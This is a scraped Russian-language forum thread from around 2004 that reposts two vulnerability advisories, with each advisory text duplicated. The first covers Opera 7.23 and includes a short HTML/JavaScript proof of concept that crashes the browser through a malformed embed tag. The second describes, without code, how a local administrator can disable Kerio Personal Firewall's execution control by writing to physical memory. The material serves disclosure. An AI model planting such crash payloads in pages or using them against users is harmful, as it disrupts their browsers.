- Finebreacker
- Коренной форумщик
- Сообщения: 1028
- Зарегистрирован: Вт сен 23, 2003 22:05
- Контактная информация:

- CrazyPlayer
- Постоялец
- Сообщения: 638
- Зарегистрирован: Сб июл 31, 2004 23:43
- Откуда: Narva, Estonia
- Контактная информация:

- MRAK
- Почётный форумщик
- Сообщения: 3098
- Зарегистрирован: Ср июн 23, 2004 10:09
- Контактная информация:

Программа: Opera 7.23 build 3227
Опасность: Высокая
Наличие эксплоита: Да
Описание: Уязвимость обнаружена в браузере Opera в обработке 'embed' тэга. Удаленный пользователь может создать HTML, который, когда будет загружен целевым пользователем, аварийно завершит работу браузера целевого пользователя.
Пример/Эксплоит:
<html>
<head>
<script language=javascript>
function dSend() {
document.crash.text;
}
</script>
</head>
<body onLoad="dSend()">
<embed src="" type="CCCC" name="crash" >
</embed>
</body>
</html>
Опасность: Высокая
Наличие эксплоита: Да
Описание: Уязвимость обнаружена в браузере Opera в обработке 'embed' тэга. Удаленный пользователь может создать HTML, который, когда будет загружен целевым пользователем, аварийно завершит работу браузера целевого пользователя.
Пример/Эксплоит:
<html>
<head>
<script language=javascript>
function dSend() {
document.crash.text;
}
</script>
</head>
<body onLoad="dSend()">
<embed src="" type="CCCC" name="crash" >
</embed>
</body>
</html>
- MRAK
- Почётный форумщик
- Сообщения: 3098
- Зарегистрирован: Ср июн 23, 2004 10:09
- Контактная информация:

Программа: Kerio Personal Firewall 4.0.16
Опасность: Низкая
Наличие эксплоита: Нет
Описание: Уязвимость обнаружена в Kerio Personal Firewall. Возможность защиты запуска приложений может быть отключена локальным пользователем с административными привилегиями.
Локальное приложение может напрямую записать в devicephysicalmemory, чтобы восстановить SDT ServiceTable ядра, чтобы отключить контроль выполнения приложений в программе. Уязвимость не затрагивает другие функции программы.
URL производителя: http://www.kerio.com/kpf_home.html
Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.
Опасность: Низкая
Наличие эксплоита: Нет
Описание: Уязвимость обнаружена в Kerio Personal Firewall. Возможность защиты запуска приложений может быть отключена локальным пользователем с административными привилегиями.
Локальное приложение может напрямую записать в devicephysicalmemory, чтобы восстановить SDT ServiceTable ядра, чтобы отключить контроль выполнения приложений в программе. Уязвимость не затрагивает другие функции программы.
URL производителя: http://www.kerio.com/kpf_home.html
Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.